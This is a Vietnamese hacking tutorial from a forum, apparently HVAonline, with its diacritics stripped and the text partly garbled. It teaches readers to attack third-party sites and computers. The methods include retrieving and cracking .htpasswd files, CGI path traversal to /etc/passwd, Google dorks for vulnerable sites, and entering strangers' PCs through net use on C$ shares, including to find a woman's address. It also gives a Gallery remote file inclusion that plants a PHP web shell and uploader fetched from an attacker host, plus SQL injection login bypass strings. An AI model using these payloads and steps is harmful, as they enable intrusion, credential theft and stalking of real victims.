Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D nhin l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ? ci ny n c s can thip ca thng file .htaccess . Do khi cng trong cng th mc chng c tc ng qua li bo v ln nhau nn chng ta cng khng di g m c gng t nhp ri crack m mt khu cht tit ( khi cha c ngh crack mt khu trong tay . Ti cng ang nghin cu c th xm nhp trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y , chuyn g s xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta s chm c n d dng , bn hy xem link VD sau : http://www.company.com/cgi-bin/protected/
hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL sau : http://www.company.com/cgi-bin/protected/.htp%20asswd Nu bn thy c cu tr lI `File not found` hoc tng t th chc chn file ny khng c bo v , bn hy tm ra n bng mt trong cc URL sau : http://www.company.com/.htpasswd</ a> http://www.company.com/cgi-bin/.htpasswd http://www.company.com/cgi-bin/passwords/.htp%20asswd http://www.company.com/cgi-bin/passwd/.htpass%20wd nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n nm ngay th mc gc y ) , cho n khi no cc bn tm thy th thi nh . Khi tm thy file ny ri , bn hy dng chng trnh ``John the ripper`` hoc ``Crackerjack``, crack passwd ct trong . Cng vic tip theo hn cc bn bit l mnh phi lm g rI , ly user name v passwd hp l t nhp vo ri xem th my c cu tm s nhng g trong , nhng cc bn cng ng c i pass ca h hay quy h nh . Cch ny cc bn cng c th p dng ly pass ca admin v hu ht nhng thnh vin trong nhm kn u l c chc c quyn c .
23 . ) Tm hiu v CGI ? _ CGI l t vit tt ca Common Gateway Interface , a s cc Website u ang s dng chng trnh CGI ( c gI l CGI script ) thc hin nhng cng vic cn thit 24 gi hng ngy . Nhng nguyn bn CGI script thc cht l nhng chng trnh c vit v c upload ln trang Web vI nhng ngn ng ch yu l Perl , C , C++ , Vbscript trong Perl c a chung nht v s d dng trong vic vit chng trnh ,chim mt dung lng t v nht l n c th chy lin tc trong 24 gi trong ngy . _ Thng thng , CGI script c ct trong th mc /cgi-bin/ trn trang Web nh VD sau : http://www.company.com/cgi-bin/login.cgi
vi nhng cng vic c th nh : + To ra chng trnh m s ngi gh thm . + Cho php nhng ngI khch lm nhng g v khng th lm nhng g trn Website ca bn . + Qun l user name v passwd ca thnh vin . + Cung cp dch v Mail . + Cung cp nhng trang lin kt v thc hin tin nhn qua li gia cc thnh vin . + Cung cp nhng thng bo li chi tit .v.v.. 24 . ) Cch hack Web c bn nht thng qua CGI script : _ Li th 1 : li nph-test-cgi + nh tn trang Web b li vo trong trnh duyt ca bn . + nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi + Lc trn URL bn s nhn ging nh th ny : http://www.servername.com/cgi-bin/nph-test-cg%20i + Nu thnh cng bn s thy cc th mc c ct bn trong . xem th mc no bn nh tip : CODE ? /*
+ file cha passwd thng c ct trong th mc /etc , bn hy nh trn URL dng sau : http://www.servername.com/cgi-bin/nph-test-cg%20i?/etc/*
_ Li th 2 : li php.cgi + Tng t trn bn ch cn nh trn URL dng sau ly pass : http://www.servername.com/cgi-bin/php.cgi?/et c/passwd Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc hnh rt kh , cc bn hy vo trang google.com ri nh t kho : /cgi-bin/php.cgi?/etc/passwd] hoc cgi-bin/nph-test-cgi?/etc sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh . 25 . ) K thut xm nhp my tnh ang online : _ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc s dng trn my ca nn nhn s b chm i mt cch ng k v nhng my h khng share th khng th xm nhp c, do nu h tt my l mnh s b cng cc khi cha kp chm account , c mt cch m thm hn , t lm gim tc hn v c th xm nhp khi nn nhn khng share l dng chng trnh DOS tn cng . Ok , ta s bt u : _ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu . _ Vo Start == > Run g lnh cmd . _ Trong ca s DOS hy nh lnh net view CODE + VD : c:\net view 203.162.30.xx
_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh net use < a bt k trn my ca bn > : < share ca nn nhn > + VD : c:\net use E : 203.162.30.xxC _ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy download chng trnh d passwd v s dng ( theo ti bn hy load chng trnh pqwak2 p dng cho vic d passwd trn my s dng HH Win98 hoc Winme v chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai chng trnh tng t nhau , dng u ta nh IP ca nn nhn , dng th hai ta nh tn a share ca nn nhn nhng i vi xIntruder ta ch chnh Delay ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trong mng Internet l trn dI 5000 . _ Nu my ca nn nhn khng c share th ta nh lnh : net use < a bt k trn my ca bn > : c$ (hoc d$)`àdministrator``
+ VD : net use E : 203.162.30.xxC$`àdministrator`` Kiu chia s bng c$ l mc nh i vi tt c cc my USER l `àdministrator`` . _ Chng ta c th p dng cch ny t nhp vo my ca c bn m mnh thm thng trm nh tm nhng d liu lin quan n a ch ca c nng ( vi iu kin l c ta ang dng my nh v bn may mn khi tm c a ch ) . Bn ch cn chat Y!Mass ri vo DOS nh lnh : c:\netstat n Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta thi , n s gip bn d dng hn trong vic xc nh a ch IP ca c ta . Sau bn dng cch xm nhp m ti ni trn .( C l anh chng tykhung ca chng ta hi xa khi tn tnh c bn xa qua mng cng dng cch ny t nhp v tm hiu a ch ca c ta y m , hi`hi` . ) Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy . =================================================== = Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp , nhng ti khng th a ra c v rt kinh nghim nhng bi hng dn c a ch chnh xc , khi cc bn thc hnh xong ot c quyn admin c bn xo ci database ca h . Nh vy HVA s mang ting l ni bt ngun cho s ph hoi trn mng . mong cc bn thng cm , nu c th th ti ch nu nhng cch thc cc bn tm nhng da ch b li ch khng a ra a ch c th no . =================================================== = phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnh khi bn online , tm hiu s cc bc khi ta quyt nh hack mt trang Web , k thut tm ra li trang Web thc hnh , k thut hack Web thng qua li Gallery.v.v. GOOKLUCK!!!!!!!!!
26 . ) Tm hiu v RPC (Remote Procedure Call) : _ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng phn tn . Microsoft RPC bao gm cc th vin v cc dch v cho php cc ng dng phn tn hot ng c trong mi trng Windows NT. Cc ng dng phn tn chnh bao gm nhiu tin trnh thc thi vi nhim v xc nh no . Cc tin trnh ny c th chy trn
mt hay nhiu my tnh. _Microsoft RPC s dng name service provider nh v Servers trn mng. Microsoft RPC name service provider phi i lin vi Microsoft RPC name service interface (NIS). NIS bao bao gm cc hm API cho php truy cp nhiu thc th trong cng mt name service database (name service database cha cc thc th, nhm cc thc th, lch s cc thc th trn Server). Khi ci t Windows NT, Microsoft Locator t ng c chn nh l name service provider. N l name service provider ti u nht trn mi trng mng Windows NT. 27 . ) K thut n gin chng li s xm nhp tri php khi ang online thng qua RPC (Remote Procedure Call) : _ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b admin remote desktop theo di , bn ch cn tt chc nng remote procedure call th hin ti khng c chng trnh no c th remote desktop theo di bn c . N cn chng c hu ht tools xm nhp vo my ( v a s cc tools vit connect da trn remote procedure call ( over tcp/ip )).Cc trojan a s cng da vo giao thc ny. Cch tt: Bn vo service /remote procedure call( click chut phi ) chn starup typt/disable hoc manual/ apply. y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file sharing th rt kh b hack ) ,nhng trong mng LAN bn cng phin phc vi n khng t v bn s khng chy c cc chng trnh c lin quan n thit b ny . Ty theo cch thc bn lm vic m bn c cch chn la cho hp l . Theo ti th nu dng trong mng LAN bn hy ci mt firewall l chc chn tng i an ton ri . ( Da theo bi vit ca huynh i nh c khoai khoaimi admin ca HVA ) 28 . ) Nhng bc hack mt trang web hin nay : _ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta thc hin nhng bc sau : + FootPrinting : ( In du chn ) y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh nghip/ngi dng. N bao gm chi tit v a ch IP, Whois, DNS ..v.v i khi l nhng thong tin chnh thc c lien quan n mc tiu. Nhiu khi n gin hacker ch cn s dng cc cng c tm kim trn mng tm nhng thong tin . + Scanning : ( Qut thm d ) Khi c nhng thng tin ri, th tip n l nh gi v nh danh nhng nhng dch v m mc tiu c. Vic ny bao gm qut cng, xc nh h iu hnh, .v.v.. Cc cng c c s dng y nh nmap, WS pingPro, siphon, fscam v cn nhiu cng c khc na. + Enumeration : ( lit k tm l hng ) Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng
m c th s dng xm nhp. N bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. + Gaining Access: ( Tm cch xm nhp ) By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii m file password, hay th thin nht l brute force (kim tra tt c cc trng hp) password. Cc cng c thng c s dng bc ny l NAT, podium, hoc L0pht. + Escalating Privileges : ( Leo thang c quyn ) V d trong trng hp hacker xm nhp c vo mng vi ti khon guest, th h s tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. + Pilfering : ( Dng khi cc file cha pass b s h ) Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l mi ngon cho hacker. + Covering Tracks : ( Xo du vt ) Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. + Creating ``Back Doors`` : ( To ca sau chun b cho ln xm nhp tip theo c d dng hn ) Hacker li ``Back Doors``, tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog + Denial of Service (DoS) : ( Tn cng kiu t chi dch v ) Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cui cng tn cng h thng. Nu h thng khng c cu hnh ng cch, n s b ph v v cho php hacker truy cp. Hoc trong trng hp khc th DoS s lm cho h thng khng hot ng c na. Cc cng c hay c s dng tn cng DoS l trin00, Pong Of Death, teardrop, cc loi nuker, flooder . Cch ny rt li hi , v vn cn s dng ph bin hin nay . _ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no . Khng nht thit phI lm theo tun t . Cc bn hy nh n cu bit ngi bit ta trm trn trm thng . ( Ti liu ca HVA v hackervn.net ) 29 . ) Cch tm cc Website b li : _ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tin trn mng ch ? Nhng cc bn chc cng khng ng l ta c th dng nhng trang tm nhng trang Web b li ( Ti vn thng dng trang google.com v khuyn cc bn cng nn dng trang ny v n rt mnh v hiu qu ) . _ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vo google.com
v nh on li vo sau allinurl : . VD ta c on m li trang Web sau : cgi-bin/php.cgi?/etc/passwd cc bn s nh : allinurl:cgi-bin/php.cgi?/etc/passwd N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hy nhn xung di cng ca mi mu lit k ( dng a ch mu xanh l cy ) nu dng no vit y chang t kho mnh nhp vo th trang hoc ang b li .Cc bn c xm nhp vo c hay khng th cng cn tu vo trang Web fix li ny hay cha na . _ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch cn nhp t kho powered by VD sau l tm forum dng Snitz 2000 : powered by Snitz 2000 _ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch c xc sut khng cao , bn hy quan tm n on string c bit trong URL c trng cho tng kiu trang Web hoc forum ( ci ny rt quan trng , cc bn hy t mnh tm hiu thm nh ) . VD tm vi li Hosting Controller th ta s c on c trng sau ``/admin hay /advadmin hay /hosting`` ta hy nh t kho : allinurl:/advadmin hoc allinurl:/admin hoc allinurl:/hosting N s lit k ra cc trang Web c URL dng : http://tentrangweb.com/advadmin hoc http://tentrangweb.com/admin hoc http://tentrangweb.com/hosting VD vi forum UBB c on c trng ``cgi-bin/ultimatebb.cgi?`` Ta cng tm tng t nh trn . Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin cp nht bn
trang Li bo mt ca HVA do bn LeonHart post hng ngy cc bn s hiu c ngha ca chng v t mnh kim tra . 30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php code inject ): _ Gallery l mt cng c cho php to mt gallery nh trn web c vit bng PHP , li dng s h ny ta c th li dng vit thm vo mt m PHP cho php ta upload , chnh l mc ch chnh ca ta . _ Trc ht bn hy ng k mt host min ph , tt nht l bn ng k brinkster.com cho d . Sau bn m notepad v to file PHP vi on m sau : CODE <?php global $PHP_SELF; echo `` <form method=post action=$PHP_SELF?$QUERY_STRING > <input type=text name=shell size=40 > <input type=hidden name=act value=shell > <input type=submit value=Go name=sm > ``; set_magic_quotes_runtime(1); if ($act == ``shell``) { echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n< xmp > ``; system($shell); echo `` \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n``; } echo `` ``; ?>
on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m ) v t tn l : + shellphp.php : file ny dng chy shell trn victim host . + init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload file init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun upload file ny ln l tiu ) Bn hy to thm mt file PHP vi m sau : CODE <?php function handleupload() { if (is_uploaded_file($_FILES[ùserfile`][`tmp_name`])) { $filename = $_FILES[ùserfile`][`tmp_name`]; print ``$filename was uploaded successfuly``;
$realname = $_FILES[ùserfile`][`name`]; print ``realname is $realname\n``; print ``copying file to uploads dir ``.$realname; copy($_FILES[ùserfile`][`tmp_name`],*PATH*.$realna me); // lu *PATH* chng ta s thay i sau } else { echo ``Possible file upload attack: filename``.$_FILES[ùserfile`][`name`].``.``; } } if ($act == `ùpload``) { handleupload(); } echo `` <form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING > File:<INPUT TYPE=FILE NAME=userfile SIZE=35 > <input type=hidden name=MAX_FILE_SIZE value=1000000 > <input type=hidden name=act value=upload > <input type=submit value=Upload name=sm > ``; ?>
Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn . _ Tip theo Bn vo Google, g ``Powered by gallery`` ri enter, Google s lit k mt ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link sau th xem n cn mc lI Gallery hay khng : http:// trang Web ca nn nhn > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Nu bn thy hin ln mt hnh ch nht pha trn cng , bn phi ca n l lnh chuyn tip c ch Go l coi nh bn tm thy c I tng ri . By gi bn c th g lnh thng qua ch nht hack Web ca nn nhn . Trc ht bn hy g lnh pwd xc nh ng dn tuyt i n th mc hin thi ri nhn nt Go , khi n cho kt qu bn hy nhanh chng ghi li ng dn pha dI ( Ti s s dng VD ng dn ti tm thy l /home/abc/xyz/gallery ). Sau bn nh tip lnh |s a| lit k cc th mc con ca n . By gi bn hy nhn kt qu , bn s thy mt ng cc th mc con m ta lit k . Bn hy lun nh l mc ch ca chng ta l tm mt th mc c th dng upload file upload.php m ta chun b t trc do bn hy xc nh cng ti bng cch nhn vo nhng ch cuI cng ca mi hng kt qu : + Bn hy loi b trng hp cc th mc m c du . hoc .. v y l th mc gc hoc l th mc o ( N thng c xp trn cng ca cc hng kt qu ) . + Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nh config.php ,
check.inc .v.v ) v y l nhng file ch khng phi l th mc . + Cn li l nhng th mc c th upload nhng ti khuyn bn nn chn nhng hng cha tn th mc m c cha s ln hn 1 ( Bn c th xc nh c chng bng cch nhn ct th 2 t tri sang ) , v nh vy va chc chn y l th mc khng phi th mc o , va lm cho admin ca trang Web kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hin ra th mc loveyou c cha 12 file c th cho ta upload , nh vy ng dn chnh thc m ta upload ln s l : /home/abc/xyz/Gallery/loveyou By gi bn hy vo account host ca bn, sa ni dung file init.php ging nh m ca file upload.php, nhng sa li *PATH* thnh /home/abc/xyz/gallery/loveyou/ . ng thi cng chun b mt file upload.php trn my ca bn vi *PATH* l ( 2 du ngoc kp ). By gi l ta c th upload file upload.php ln trang Web ca nn nhn c ri , bn hy nhp a ch sau trn trnh duyt Web ca bn : http:// trang Web ca nn nhn > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 nt lnh , mt l nt brown , mt l nt upload . Nt brown bn dng dn n a ch file upload.php bn chun b trn my ca bn , nt upload khi bn nhn vo th n s upload file upload.php ln trang Web ca nn nhn . Ok , by gi coi nh bn hon thnh chng ng hack Web ri . T by gi bn hy vn dng tn cng i th nh ly database , password ( lm tng t nh cc bi hng dn hack trc ) , nhng cc bn ch nn thc tp ch ng xo database hay ph Web ca h. Nu l mt hacker chn chnh cc bn ch cn upload ln trang Web dng ch : Hack by .. l ri . Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tu thuc vo s may mn v kin tr nghin cu vn dng kin thc ca cc bn . ( Da theo hng dn hack ca huynh vnofear viethacker.net )
GOODLUCK!!!!!!!!!!!! ( Ht phn 4 ) Anhdenday HVAonline.net
31 . ) Gi tin TCP/IP l g? TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol, mt Gi tin TCP/IP l mt khi d liu c nn, sau km thm mt header v gi n mt my tnh khc. y l cch thc truyn tin ca internet, bng cch gi cc gi tin. Phn header trong mt gi tin cha a ch IP ca ngi gi gi tin. Bn c th vit li mt gi tin v lm cho n trong ging nh n t mt ngi khc!! Bn c th dng cch ny tm cch truy nhp vo rt nhiu h thng m khng b bt. Bn s phi chy trn Linux hoc c mt chng trnh cho php bn lm iu ny.
32 . ) Linux l gi`: _Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m trch chc v lin lc gia cc chng trnh ng dng my tnh v phn cng. Cung cp cc chng nng nh: qun l file, qun l b nh o, cc thit b nhp xut nhng cng, mn hnh, bn phm, .... Nhng Nhn Linux cha phi l 1 HH, v th nn Nhn Linux cn phi lin kt vi nhng chng trnh ng dng c vit bi t chc GNU to ln 1 HH hon chnh: HH Linux. y cng l l do ti sao chng ta thy GNU/Linux khi c nhc n Linux. Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny ( Nhn v Chng trnh ng dng ) sau sa cha mt s cu hnh mang c trng ca cng ty/ t chc mnh v lm thm phn ci t ( Installation Process ) cho b Linux , chng ta c : Distribution. Cc Distribution khc nhau s lng v loi Software c ng gi cng nh qu trnh ci t, v cc phin bn ca Nhn. 1 s Distribution ln hin nay ca Linux l : Debian, Redhat, Mandrake, SlackWare, Suse . 33 . ) Cc lnh cn bn cn bit khi s dng hoc xm nhp vo h thng Linux : _ Lnh `` man`` : Khi bn mun bit cch s dng lnh no th c th dng ti lnh nay : Cu trc lnh : $ man . V d : $ man man _ Lnh `` uname ``: cho ta bit cc thng tin c bn v h thng V d : $uname -a ; n s a ra thng tin sau : Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown _ Lnh id : xem uid/gid hin ti ( xem nhm v tn hin ti ) _ Lnh w : xem cc user ang login v action ca h trn h thng . V D : $w n s a ra thng tin sau : 10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00 _ Lnh ps: xem thng tin cc process trn h thng V d : $ps axuw
_ Lnh cd : bn mun di chuyn n th mc no . phi nh n lnh ny . V du : $ cd /usr/bin ---- > n s a bn n th mc bin _ Lnh mkdir : to 1 th mc . V d : $ mkdir /home/convit --- > n s to 1 th mc convit trong /home _ Lnh rmdir : g b th mc V d : $ rmdir /home/conga ---- > n s g b th mc conga trong /home . _ Lnh ls: lit k ni dung th mc V d : $ls -laR / _ Lnh printf: in d liu c nh dng, ging nh s dng printf() ca C++ . V d : $printf %s ``\x41\x41\x41\x41`` _ Lnh pwd: a ra th mc hin hnh V d : $pwd ------ > n s cho ta bit v tr hin thi ca ta u : /home/level1 _ Cc lnh : cp, mv, rm c ngha l : copy, move, delete file V d vi lnh rm (del) : $rm -rf /var/tmp/blah ----- > n s del file blah . Lm tng t i vi cc lnh cp , mv . _ Lnh find : tm kim file, th mc V d : $find / -user level2 _ Lnh grep: cng c tm kim, cch s dng n gin nht : grep ``something`` Vidu : $ps axuw | grep ``level1`` _ Lnh Strings: in ra tt c cc k t in c trong 1 file. Dng n tm cc khai bo hnh chui trong chng trnh, hay cc gi hm h thng, c khi tm thy c password na VD: $strings /usr/bin/level1 _ Lnh strace: (linux) trace cc gi hm h thng v signal, cc k hu ch theo di flow ca chng trnh, cch nhanh nht xc nh chng trnh b li on no. Trn cc h thng unix khc, tool tng ng l truss, ktrace . V d : $strace /usr/bin/level1 _ Lnh`` cat, more ``: in ni dung file ra mn hnh $cat /etc/passwd | more -- > n s a ra ni dung file passwd mt cch nhanh nht . $more /etc/passwd ---- > N s a ra ni dung file passwd mt cch t t . _ Lnh hexdump : in ra cc gi tr tng ng theo ascii, hex, octal, decimal ca d liu nhp vo . V d : $echo AAAA | hexdump _ Lnh : cc, gcc, make, gdb: cc cng c bin dch v debug . V d : $gcc -o -g bof bof.c V d : $make bof V d : $gdb level1 (gdb) break main (gdb) run _ Lnh perl: mt ngn ng V d : $perl -e `print `À``x1024` | ./bufferoverflow ( Li trn b m khi ta nh vo 1024 k t ) _ Lnh ``bash`` : n lc t ng ho cc tc v ca bn bng shell script, cc mnh v linh hot .
Bn mun tm hiu v bash , xem n nh th no : $man bash _ Lnh ls : Xem ni dung th mc ( Lit k file trong th mc ) . V D : $ ls /home ---- > s hin ton b file trong th mc Home $ ls -a ----- > hin ton b file , bao gm c file n $ ls -l ----- > a ra thng tin v cc file _ Lnh ghi d liu u ra vo 1 file : Vd : $ ls /urs/bin > ~/convoi ------ > ghi d liu hin th thng tin ca th mc bin vo 1 file convoi . 34 . ) Nhng hiu bit c bn xung quanh Linux : a . ) Mt vi th mc quan trng trn server : _ /home : ni lu gi cc file ngi s dng ( VD : ngi ng nhp h thng c tn l convit th s c 1 th mc l /home/convit ) _ /bin : Ni x l cc lnh Unix c bn cn thit nh ls chng hn . _ /usr/bin : Ni x l cc lnh dc bit khc , cc lnh dng bi ngi s dng c bit v dng qun tr h thng . _ /bot : Ni m kernel v cc file khc c dng khi khi ng . _ /ect : Cc file hot ng ph mng , NFS (Network File System ) Th tn ( y l ni trng yu m chng ta cn khai thc nhiu nht ) _ /var : Cc file qun tr _ /usr/lib : Cc th vin chun nh libc.a _ /usr/src : V tr ngun ca cc chng trnh . b . ) V tr file cha passwd ca mt s phin bn khc nhau : CODE AIX 3 /etc/security/passwd !/tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Ren /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
35 . ) Khai thc li ca Linux qua l hng bo mt ca WU-FTP server : _ WU-FTP Server (c pht trin bi i Hc Washington ) l mt phn mm Server phc v FTP c dng kh ph bin trn cc h thng Unix & Linux ( tt c cc nh phn phi: Redhat, Caldera, Slackware, Suse, Mandrake....) v c Windows.... , cc hacker c th thc thi cc cu lnh ca mnh t xa thng qua file globbing bng cch ghi ln file c trn h thng . _ Tuy nhin , vic khai thc li ny khng phI l d v n phi hi nhng iu kin sau : + Phi c account trn server . + Phi t c Shellcode vo trong b nh Process ca Server . + Phi gi mt lnh FTP c bit cha ng mt globbing mu c bit m khng b server pht hin c li . + Hacker s ghi ln mt Function, Code ti mt Shellcode, c th n s c thc thi bi chnh Server FTP . _ Ta hy phn tch VD sau v vic ghi ln file ca server FTP : CODE ftp > open localhost <== lnh m trang b li . Connected to localhost (127.0.0.1). 220 sasha FTP server (Version wu-2.6.1-18) ready <== xm nhp thnh cng FTP server . Name (localhost:root): anonymous <== Nhp tn ch ny 331 Guest login ok, send your complete e-mail address as password. Password:..<== nhp mt khu y 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. <== s dng bin nh phn chuyn i file . ftp > ls ~{ <== lnh lit k th mc hin hnh . 227 Entering Passive Mode (127,0,0,1,241,205) 421 Service not available, remote server has closed connection 1405 ? S 0:00 ftpd: accepting connections on port 21 chp nhn kt nI cng 21 . 7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd 26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 26265 tty3 R 0:00 bash -c ps ax | grep ftpd (gdb) at 26256 Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thc li Wu.ftpd . Symbols already loaded for /lib/libcrypt.so.1 Symbols already loaded for /lib/libnsl.so.1 Symbols already loaded for /lib/libresolv.so.2 Symbols already loaded for /lib/libpam.so.0 Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6 Symbols already loaded for /lib/ld-linux.so.2 Symbols already loaded for /lib/libnss_files.so.2 Symbols already loaded for /lib/libnss_nisplus.so.2 Symbols already loaded for /lib/libnss_nis.so.2 0x40165544 in __libc_read () from /lib/i686/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c
Vic khai thc qua li ny n nay ti test vn cha thnh cng ( chng bit lm sai ch no ) . Vy bn no lm c hy post ln cho anh em bit nh . Li Linux hin nay rt t ( c bit l i vi Redhat ), cc bn hy ch i nu c li g mi th bn LI bo mt s cp nht ngay . Khai thc chng nh th no th hi Mod qun l bn , c bit l bn Leonhart , cu ta sing tr li cc bn lm . ( Da theo bi vit ca huynh Binhnx2000 ) 36 . ) Tm hiu v SQL Injection : _ SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, bn c th login m khng cn username v password, thi hnh lnh t xa, ot d liu v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Netscape, Lynx, ... _ Bn c th kim c trang Web b li bng cch dng cc cng c tm kim kim cc trang cho php submit d liu . Mt s trang Web chuyn tham s qua cc khu vc n nn bn phI viewsource mI thy c . VD ta xc nh c trang ny s dng Submit d liu nh nhn vo m m ta viewsource : CODE <input type=hidden name=A value=C > _ Kim tra th xem trang Web c b li ny hay khng bng cch nhp vo login v pass ln lt nh sau : - Login: hi` or 1=1-- Pass: hi` or 1=1-Nu khng c bn th tip vi cc login v pass sau : CODE ` or 1=1--
`` or 1=1-or 1=1-` or à`=à `` or `à``=`à `) or (à`=à Nu thnh cng, bn c th login vo m khng cn phi bit username v password . Li ny c dnh dng n Query nn nu bn no tng hc qua c s d liu c th khai thc d dng ch bng cch nh cc lnh Query trn trnh duyt ca cc bn . Nu cc bn mun tm hiu k cng hn v li ny c th tm cc bi vit ca nhm vicky tm hiu thm . 37 . ) Mt VD v hack Web thng qua li admentor ( Mt dng ca li SQL Injection ) : _ Trc tin bn vo google.com tm trang Web admentor bng t kho allinurl : admentor . _ Thng thng bn s c kt qu sau : http://www.someserver.com/admentor/admin/admi%20n.asp _ Bn th nhp ` or ``=` vo login v password : CODE Login : ` or ``=` Password : ` or ``=`
_ Nu thnh cng bn s xm nhp vo Web b li vi vai tr l admin . _ Ta hy tm hiu v cch fix li ny nh : + Lc cc k t c bit nh ` `` ~ \ bng cch chm vo javascrip on m sau : CODE function RemoveBad(strTemp) { strTemp = strTemp.replace(/\<|\ > |\``|\`|\%|\;|$|$|\&|\+| \-/g,````); return strTemp; } + V gi n t bn trong ca asp script : CODE var login = var TempStr = RemoveBad (Request.QueryString(``login``)); var password = var TempStr = RemoveBad
(Request.QueryString(``password``));
- Vy l ta fix xong li . - Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu , cc bn hy test th xem i , cc trang Web Vit Nam mnh b nhiu lm , ti kim c kha kh pass admin bng cch th ny ri ( nhng cng bo h fix li ) . - C nhiu trang khi login khng phi bng ` or ``= m bng cc nick name c tht ng k trn trang Web , ta vo link thnh vin kim nick ca mt admin test th nh . Hack vui v .
phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu tn cng li hi lm cho trang Web hng mnh nh HVA ca chng ta b tt nghn ch trong thI gian ngn cc admin bn i ung cafe ht m khng ai trng coi . Km theo l cc phng php tn cng DoS v ang c s dng . GOOKLUCK!!!!!!!!!!!!!!!!!!!!
